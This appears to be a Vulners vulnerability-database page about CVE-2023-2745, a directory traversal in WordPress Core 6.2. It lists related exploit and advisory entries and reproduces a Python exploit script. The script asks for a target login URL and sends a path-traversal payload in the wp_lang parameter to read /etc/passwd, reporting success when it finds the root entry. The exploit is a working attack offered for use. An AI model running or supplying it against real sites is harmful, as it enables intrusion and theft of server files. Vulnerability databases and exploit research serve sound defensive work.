| Reporter | Title | Published | Views | Family All 70 |
|---|---|---|---|---|
| Exploit for Path Traversal in Wordpress | 22 Oct 202521:41 | – | githubexploit | |
| Exploit for Time-of-check Time-of-use (TOCTOU) Race Condition in Wordpress | 12 Jun 202313:06 | – | githubexploit | |
| Exploit for Time-of-check Time-of-use (TOCTOU) Race Condition in Wordpress | 8 Aug 202403:02 | – | githubexploit | |
| Exploit for Time-of-check Time-of-use (TOCTOU) Race Condition in Wordpress | 12 Jun 202313:06 | – | githubexploit | |
| WordPress Core 6.2 XSS / CSRF / Directory Traversal Vulnerability | 19 May 202300:00 | – | zdt | |
| CVE-2023-2745 | 17 May 202309:15 | – | attackerkb | |
| CVE-2023-2745 | 17 May 202312:31 | – | circl | |
| WordPress 路径遍历漏洞 | 17 May 202300:00 | – | cnnvd | |
| CVE-2023-2745 | 17 May 202308:36 | – | cve | |
| CVE-2023-2745 WordPress Core < 6.2.1 - Directory Traversal | 17 May 202308:36 | – | cvelist |
# Exploit Title: WordPress Core 6.2 - Directory Traversal
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Version: = 6.2
# Tested on: Win, Ubuntu
# CVE : CVE-2023-2745
import requests
from colorama import init, Fore, Style
init(autoreset=True)
url = input("E.G https://example.com/wp-login.php : ")
payload = '../../../../../etc/passwd'
response = requests.get(url, params={'wp_lang': payload})
if response.status_code == 200:
if "root:x:0:0:root" in response.text:
print(Fore.GREEN + 'Exploit successful, accessed content:')
print(Fore.GREEN + response.text)
else:
print(Fore.YELLOW + 'Accessed content, but the expected file was
not found:')
print(Fore.YELLOW + response.text)
elif response.status_code in {400, 401, 403, 404}:
print(Fore.RED + f'Client error, status code: {response.status_code}')
elif response.status_code // 100 == 5:
print(Fore.RED + f'Server error, status code: {response.status_code}')
elif response.status_code // 100 == 3:
print(Fore.YELLOW + f'Redirection, status code:
{response.status_code}')
else:
print(f'Status code: {response.status_code}')Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation